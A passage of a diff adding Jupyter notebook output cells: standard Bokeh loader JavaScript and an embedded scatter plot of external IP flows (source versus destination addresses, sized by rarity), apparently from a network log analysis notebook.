+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2214\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2214\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"b5ea4311-74c5-4740-935d-16d399194efe\" data-root-id=\"2216\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"7c8296f2-2839-4214-8b60-72ead069e93f\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"2227\"}],\"center\":[{\"id\":\"2229\"},{\"id\":\"2232\"}],\"height\":700,\"left\":[{\"id\":\"2230\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"2250\"}],\"title\":{\"id\":\"2217\"},\"toolbar\":{\"id\":\"2239\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"2219\"},\"x_scale\":{\"id\":\"2223\"},\"y_range\":{\"id\":\"2221\"},\"y_scale\":{\"id\":\"2225\"}},\"id\":\"2216\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"2228\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"text\":\"External IP flows (rare flows == larger)\",\"text_font_size\":\"15pt\"},\"id\":\"2217\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"red\"},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"2248\",\"type\":\"Circle\"},{\"attributes\":{\"source\":{\"id\":\"2215\"}},\"id\":\"2251\",\"type\":\"CDSView\"},{\"attributes\":{\"axis_label\":\"SourceIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"2257\"},\"major_label_orientation\":1.5707963267948966,\"major_label_policy\":{\"id\":\"2256\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"2228\"}},\"id\":\"2227\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"axis\":{\"id\":\"2227\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2229\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2231\",\"type\":\"CategoricalTicker\"},{\"attributes\":{},\"id\":\"2260\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis_label\":\"DestinationIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"2254\"},\"major_label_policy\":{\"id\":\"2253\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"2231\"}},\"id\":\"2230\",\"type\":\"CategoricalAxis\"},{\"attributes\":{},\"id\":\"2225\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"2253\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis\":{\"id\":\"2230\"},\"dimension\":1,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2232\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2223\",\"type\":\"CategoricalScale\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"2238\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"data\":{\"DestinationIP\":[\"40.77.228.69\",\"52.168.138.145\",\"13.71.172.130\",\"40.91.75.5\",\"40.124.45.19\",\"13.71.172.128\",\"172.217.15.99\",\"20.38.98.100\",\"104.43.212.12\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"65.55.44.109\",\"13.65.107.32\",\"40.124.45.19\",\"40.77.228.69\",\"52.165.170.112\",\"52.168.138.145\",\"72.21.81.200\",\"13.65.107.32\",\"40.124.45.19\",\"52.168.138.145\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"72.21.91.29\",\"72.21.81.200\",\"40.91.75.5\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.240\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"13.71.172.128\",\"40.77.232.95\",\"52.165.170.112\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.91.29\",\"52.168.138.145\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"23.48.36.78\",\"52.165.170.112\",\"65.55.44.109\",\"20.38.98.100\",\"8.249.241.254\",\"40.77.228.69\",\"172.217.15.99\",\"13.67.143.117\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.226.250\",\"52.239.152.10\",\"65.55.44.109\",\"90.130.70.73\",\"20.38.98.100\",\"65.55.44.109\",\"13.65.107.32\",\"13.67.143.117\",\"20.38.98.100\",\"13.67.143.117\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"20.38.98.100\",\"23.4.187.27\",\"40.124.45.19\",\"65.55.44.108\",\"72.21.81.200\",\"72.21.91.29\",\"99.84.104.63\",\"13.65.107.32\",\"40.124.45.19\",\"172.217.15.99\",\"8.249.241.254\",\"13.68.93.109\",\"40.77.228.69\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"157.55.134.136\"],\"SourceIP\":[\"10.0.3.5\",\"10.0.3.5\",\"104.43.212.12\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.65.107.32\",\"13.65.107.32\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.232.95\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.239.152.10\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.108\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.81.240\",\"72.21.91.29\",\"72.21.91.29\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAACEAAAAAAAADwPwAAAAAAABBAAAAAAAAAAEAAAAAAAAAAQAAAAAAAABBAAAAAAAAAFEAAAAAAAAAgQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAABBAAAAAAAAA8D8AAAAAAAAiQAAAAAAAADBAAAAAAAAAMEAAAAAAAABLQAAAAAAAADNAAAAAAAAAMkAAAAAAAAAzQAAAAAAAACpAAAAAAAAAMEAAAAAAAAAqQAAAAAAAAD9AAAAAAAAAAEAAAAAAAAAAQAAAAAAAABxAAAAAAAAAEEAAAAAAAAAAQAAAAAAAABxAAAAAAAAAAEAAAAAAAADwPwAAAAAAACBAAAAAAACAREAAAAAAAAAAQAAAAAAAgERAAAAAAAAAIEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAAFEAAAAAAAAAcQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAUQAAAAAAAABRAAAAAAAAAIkAAAAAAAAAcQAAAAAAAACJAAAAAAAAAFEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAAEAAAAAAAAAIQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAqQAAAAAAAAAhAAAAAAAAAAEAAAAAAAAAQQAAAAAAAABRAAAAAAAAAIkAAAAAAAAAUQAAAAAAAACBAAAAAAAAAEEAAAAAAAAAkQAAAAAAAACJAAAAAAAAAFEAAAAAAAAAYQAAAAAAAABBAAAAAAAAAGEAAAAAAAAAYQAAAAAAAACJAAAAAAAAACEAAAAAAAAAUQAAAAAAAAABAAAAAAAAACEAAAAAAAAAkQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAAAcQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[86]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85],\"plt_size\":{\"__ndarray__\":\"q6qqqqqqCkAAAAAAAAAkQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAARAAAAAAAAAAEAAAAAAAAD0PwAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAAARAAAAAAAAAJEByHMdxHMfxPwAAAAAAAOQ/AAAAAAAA5D9CewntJbTHP3kN5TWU1+A/chzHcRzH4T95DeU1lNfgP9mJndiJneg/AAAAAAAA5D/ZiZ3YiZ3oP6WUUkoppdQ/AAAAAAAAFEAAAAAAAAAUQLdt27Zt2/Y/AAAAAAAABEAAAAAAAAAUQLdt27Zt2/Y/AAAAAAAAFEAAAAAAAAAkQAAAAAAAAPQ/OR+D8zE4zz8AAAAAAAAUQDkfg/MxOM8/AAAAAAAA9D8AAAAAAAAAQAAAAAAAACRAAAAAAAAAAEC3bdu2bdv2PwAAAAAAACRAAAAAAAAAJEAAAAAAAAAAQAAAAAAAAABAchzHcRzH8T+3bdu2bdv2P3Icx3Ecx/E/AAAAAAAAAEAAAAAAAAAUQAAAAAAAACRAAAAAAAAAFECrqqqqqqoKQKuqqqqqqgpAq6qqqqqqCkAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEDZiZ3YiZ3oP6uqqqqqqgpAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAABAchzHcRzH8T8AAAAAAAAAQAAAAAAAAPQ/AAAAAAAABEAAAAAAAADwP3Icx3Ecx/E/AAAAAAAAAECrqqqqqqr6PwAAAAAAAARAq6qqqqqq+j+rqqqqqqr6P3Icx3Ecx/E/q6qqqqqqCkAAAAAAAAAAQAAAAAAAABRAq6qqqqqqCkAAAAAAAADwPwAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEC3bdu2bdv2Pw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[86]},\"size\":{\"__ndarray__\":\"AAAAAAAAMkAAAAAAAABLQAAAAAAAACtAAAAAAAAAO0AAAAAAAAA7QAAAAAAAACtAmpmZmZmZJUAAAAAAAAAbQAAAAAAAAEtAAAAAAAAAS0AAAAAAAABLQAAAAAAAACtAAAAAAAAAS0AAAAAAAAAYQAAAAAAAAAtAAAAAAAAAC0AAAAAAAADwP8prKK+hvAZAAAAAAAAACEDKayivobwGQNmJndiJnRBAAAAAAAAAC0DZiZ3YiZ0QQN9777333vs/AAAAAAAAO0AAAAAAAAA7QLdt27Zt2x5AAAAAAAAAK0AAAAAAAAA7QLdt27Zt2x5AAAAAAAAAO0AAAAAAAABLQAAAAAAAABtAE7UrUbsS9T8AAAAAAAA7QBO1K1G7EvU/AAAAAAAAG0CamZmZmZklQAAAAAAAAEtAmpmZmZmZJUC3bdu2bdseQAAAAAAAAEtAAAAAAAAAS0CamZmZmZklQJqZmZmZmSVAAAAAAAAAGEC3bdu2bdseQAAAAAAAABhAmpmZmZmZJUAAAAAAAAA7QAAAAAAAAEtAAAAAAAAAO0AAAAAAAAAyQAAAAAAAADJAAAAAAAAAMkAAAAAAAAArQAAAAAAAACtAAAAAAAAAK0DZiZ3YiZ0QQAAAAAAAADJAAAAAAAAAO0AAAAAAAAArQJqZmZmZmSVAAAAAAAAAGECamZmZmZklQAAAAAAAABtAAAAAAAAAK0CamZmZmZkVQAAAAAAAABhAmpmZmZmZJUAAAAAAAAAiQAAAAAAAACtAAAAAAAAAIkAAAAAAAAAiQAAAAAAAABhAAAAAAAAAMkCamZmZmZklQAAAAAAAADtAAAAAAAAAMkCamZmZmZkVQAAAAAAAAEtAAAAAAAAAS0AAAAAAAABLQAAAAAAAAEtAAAAAAAAAS0C3bdu2bdseQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[86]}},\"selected\":{\"id\":\"2259\"},\"selection_policy\":{\"id\":\"2260\"}},\"id\":\"2215\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"red\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"2249\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"2254\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{},\"id\":\"2257\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"factors\":[\"10.0.3.5\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"]},\"id\":\"2219\",\"type\":\"FactorRange\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"SourceIP\",\"@SourceIP\"],[\"DestinationIP\",\"@DestinationIP\"],[\"value\",\"@size\"]]},\"id\":\"2245\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"2256\",\"type\":\"AllLabels\"},{\"attributes\":{},\"id\":\"2259\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"2215\"},\"glyph\":{\"id\":\"2248\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2249\"},\"view\":{\"id\":\"2251\"}},\"id\":\"2250\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2233\"},{\"id\":\"2234\"},{\"id\":\"2235\"},{\"id\":\"2236\"},{\"id\":\"2237\"},{\"id\":\"2245\"}]},\"id\":\"2239\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2233\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"2237\",\"type\":\"SaveTool\"},{\"attributes\":{\"factors\":[\"99.84.104.63\",\"90.130.70.73\",\"8.249.241.254\",\"72.21.91.29\",\"72.21.81.240\",\"72.21.81.200\",\"65.55.44.109\",\"65.55.44.108\",\"52.239.152.10\",\"52.168.138.145\",\"52.165.170.112\",\"40.91.75.5\",\"40.77.232.95\",\"40.77.228.69\",\"40.77.226.250\",\"40.124.45.19\",\"23.48.36.78\",\"23.4.187.27\",\"20.38.98.100\",\"172.217.15.99\",\"157.55.134.136\",\"13.83.148.218\",\"13.71.172.130\",\"13.71.172.128\",\"13.68.93.109\",\"13.67.143.117\",\"13.65.107.32\",\"104.43.212.12\"]},\"id\":\"2221\",\"type\":\"FactorRange\"},{\"attributes\":{\"overlay\":{\"id\":\"2238\"}},\"id\":\"2234\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"2235\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"2236\",\"type\":\"ResetTool\"}],\"root_ids\":[\"2216\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"7c8296f2-2839-4214-8b60-72ead069e93f\",\"root_ids\":[\"2216\"],\"roots\":{\"2216\":\"b5ea4311-74c5-4740-935d-16d399194efe\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2216"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Figure(id='2216', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'2216', <span id=\"2313\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[CategoricalAxis(id='2227', ...)],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='2229', ...), Grid(id='2232', ...)],</div></div><div class=\"2312\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: 